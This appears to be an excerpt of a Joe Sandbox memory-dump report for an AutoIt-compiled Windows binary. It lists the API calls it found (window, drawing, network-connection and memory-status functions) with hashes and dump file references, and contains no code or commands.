• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: 10682d683dae73c79f178502985831ae4b32fdfc2aa73c66dc4e5d401875aa37
• Instruction ID: 88633e3a6269de797d3ae4ae3f7ef4a9cce02110766e6f574eeee6761ecf4956
• Opcode Fuzzy Hash: 10682d683dae73c79f178502985831ae4b32fdfc2aa73c66dc4e5d401875aa37
• Instruction Fuzzy Hash: 2FE06DB21012247ADA249BA29C4DEEBBF6CDB43BA1F018019F10AE24C0DBA08941D2B1
APIs
  • Part of subcall function 00A11F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A11F87
  • Part of subcall function 00A11F2D: SelectObject.GDI32(?,00000000), ref: 00A11F96
  • Part of subcall function 00A11F2D: BeginPath.GDI32(?), ref: 00A11FAD
  • Part of subcall function 00A11F2D: SelectObject.GDI32(?,00000000), ref: 00A11FD6
• MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00AA92E3
• LineTo.GDI32(?,?,?), ref: 00AA92F0
• EndPath.GDI32(?), ref: 00AA9300
• StrokePath.GDI32(?), ref: 00AA930E
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
• String ID:
• API String ID: 1539411459-0
• Opcode ID: 7296ecf21986d914636f1407cfd7c54232d75cbf5dad3631edfd11b254b6a62e
• Instruction ID: 767de12d75ee949c47415a999010bd2ef30cb6d5a728fa833dfa9f142fe2df40
• Opcode Fuzzy Hash: 7296ecf21986d914636f1407cfd7c54232d75cbf5dad3631edfd11b254b6a62e
• Instruction Fuzzy Hash: B6F05E31045259BADB129F94AC0EFCE3F69AF0B320F048100FA52250E2C77595639BA5
APIs
• GetSysColor.USER32(00000008), ref: 00A121BC
• SetTextColor.GDI32(?,?), ref: 00A121C6
• SetBkMode.GDI32(?,00000001), ref: 00A121D9
• GetStockObject.GDI32(00000005), ref: 00A121E1
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: Color$ModeObjectStockText
• String ID:
• API String ID: 4037423528-0
• Opcode ID: be00b92518d19bbe9d7033fce2c53bb04ec1f9871650b88a698916f5619b57fb
• Instruction ID: db4fecdc55eba91e0c7fbb63b7732e2b769d44804cc70078fe93be0d69f9dcdb
• Opcode Fuzzy Hash: be00b92518d19bbe9d7033fce2c53bb04ec1f9871650b88a698916f5619b57fb
• Instruction Fuzzy Hash: 1BE06532240241BEDB219BB4AC097E97B11AB53336F14831DF7F7584E0C77186469B10
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00A6EC36
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00A6EC40
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A6EC60
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?), ref: 00A6EC81
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00A6EC4A
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00A6EC54
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A6EC60
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?), ref: 00A6EC81
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A141EA: _wcslen.LIBCMT ref: 00A141EF
                                                                                                                                                                                                                                                                                                    • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00A85919
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: *$LPT
                                                                                                                                                                                                                                                                                                    • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00A3E67D
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                                                                    • String ID: pow
                                                                                                                                                                                                                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                    • String ID: #
                                                                                                                                                                                                                                                                                                    • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                                                    • Opcode ID: c6a369610381837793b249010dc5301a4a605981deeb09876274c634d8aec9ad
                                                                                                                                                                                                                                                                                                    • Instruction ID: 34c154ff6d3aab4cbc539d1b1dcecbdd206af2c8ef1acee44983539db77cb803
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6a369610381837793b249010dc5301a4a605981deeb09876274c634d8aec9ad
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C513131604256DFCB25DF28D445AFA7BB8EF25310F248166F8919B2D0DF389D82CB61
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00A2F6DB
                                                                                                                                                                                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 00A2F6F4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1b71bc4d1c8fdb5fe30f752187c3ebf8b5c1331d8e80d603ded60d27b2587233
                                                                                                                                                                                                                                                                                                    • Instruction ID: 794cf2b03c4bcb38b4bd09f18157a1b28ec8c51cfce31f16b12aba4aeb1c3565
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b71bc4d1c8fdb5fe30f752187c3ebf8b5c1331d8e80d603ded60d27b2587233
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA5115714087489BD320AF50DD86BABBBF8FF94344F82485DF599421A1DF308969CB66
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: CALLARGARRAY
                                                                                                                                                                                                                                                                                                    • API String ID: 157775604-1150593374
                                                                                                                                                                                                                                                                                                    • Opcode ID: e88c94bdca056966352f1a20a51d5f706016bda9e61a4325f399cea29fd89124
                                                                                                                                                                                                                                                                                                    • Instruction ID: 567ecb001dd664c05f2c782d46f05203e6330f094fcc59eae3159cf1b4cdc1bf
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e88c94bdca056966352f1a20a51d5f706016bda9e61a4325f399cea29fd89124
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 38419C71E002199FCF04EFA8C9959EEBBF5FF59364F104169E406AB291EB709D81CB90
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A8DB75
                                                                                                                                                                                                                                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00A8DB7F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CrackInternet_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: |
                                                                                                                                                                                                                                                                                                    • API String ID: 596671847-2343686810
                                                                                                                                                                                                                                                                                                    • Opcode ID: 6200927edc2f0db4f950bfc27ff78414af553fcb069fa1a59bf6404d8ac1343f
                                                                                                                                                                                                                                                                                                    • Instruction ID: ec63de43e21cff36e2b48229d8c30d5904b9f702991ab8f5b9e7e4354536b6a5
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6200927edc2f0db4f950bfc27ff78414af553fcb069fa1a59bf6404d8ac1343f
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0313C71801119ABCF15EFB4CD85AEEBFB9FF04344F100029F815A61A2EB759A56DB60
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00AA40BD
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00AA40F8
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                                                    • String ID: static
                                                                                                                                                                                                                                                                                                    • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                                                    • Opcode ID: bc112f24345f49a637cc01318b561210ee1eb44e21d211a867d7d8bc882b716a
• Instruction ID: a52121c61692ae6a3ca6647f9edda9294add8be8e0c18c7bacc6fc7e3493c0a0
• Opcode Fuzzy Hash: bc112f24345f49a637cc01318b561210ee1eb44e21d211a867d7d8bc882b716a
• Instruction Fuzzy Hash: 98317E71110604AADB25DF78CC80BFB77A9FF89724F008619F9A587190DB75AC81EB60
APIs
• SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00AA50BD
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AA50D2
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: MessageSend
• String ID: '
• API String ID: 3850602802-1997036262
• Opcode ID: 2931afc122a673ebf6a3c409fdd4e221ca250aa0f20e6fb26ef9c5af2e35c228
• Instruction ID: 97bf4b0051e0c75e6f6b7d2f1b07823c6cec7c0be6f1b10ac751eca4b2c9bde9
• Opcode Fuzzy Hash: 2931afc122a673ebf6a3c409fdd4e221ca250aa0f20e6fb26ef9c5af2e35c228
• Instruction Fuzzy Hash: 75311874E0160AAFDB14CFA9C980BDE7BB5FF4A300F10406AE904AB391D771A945CF94
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00AA3D18
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AA3D23
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: 92eef49d158cfe8cbf04ea694776180b5a6a8c44915f6c5e31d57999dabd16ed
• Instruction ID: 0a26014bb7ba03f390c72a1d8f99646ad3ae2c39020802e6c1bf1ee73d7955a6
• Opcode Fuzzy Hash: 92eef49d158cfe8cbf04ea694776180b5a6a8c44915f6c5e31d57999dabd16ed
• Instruction Fuzzy Hash: 29119072600208BFEF118F54DC81FAB3B6AEB863A4F104525F915972D0D7719D5187A0
APIs
  • Part of subcall function 00A17873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00A178B1
  • Part of subcall function 00A17873: GetStockObject.GDI32(00000011), ref: 00A178C5
  • Part of subcall function 00A17873: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A178CF
• GetWindowRect.USER32(00000000,?), ref: 00AA4216
• GetSysColor.USER32(00000012), ref: 00AA4230
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: 90e3268c0a07d0607a713c92090bf44fc0838e07be2f79b7a6a27627ded13214
• Instruction ID: cb40432c86ced309d3973c4471dc61acaf0f77c52a143a0cea18f9d82fbb0b04
• Opcode Fuzzy Hash: 90e3268c0a07d0607a713c92090bf44fc0838e07be2f79b7a6a27627ded13214
• Instruction Fuzzy Hash: 5D11F67261020AAFDB01DFA8CC45AFE7BB8EB49314F014914F996E3290E775E8559B60
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A8D7C2
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00A8D7EB
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
• Opcode ID: 7d11e10b4b851d7b584052636e9158fa4e97b344da5003f3478be9921c246443
• Instruction ID: f6bd9ce11172f3a076f30df36b359dae923d3a22310e17dd05f522301b4a61e6
• Opcode Fuzzy Hash: 7d11e10b4b851d7b584052636e9158fa4e97b344da5003f3478be9921c246443
• Instruction Fuzzy Hash: 6911C271205232BED7389B668C49EE7BFADEB127A8F10422AB549921C0D6649840D7F0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?,?), ref: 00A7761D
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A77629
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                                                    • String ID: STOP
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A74620
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00A72699
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A74620
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 00A72593
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A74620
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 00A72615
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1B329: _wcslen.LIBCMT ref: 00A1B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A745FD: GetClassNameW.USER32(?,?,000000FF), ref: 00A74620
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00A72720
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00A7146F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
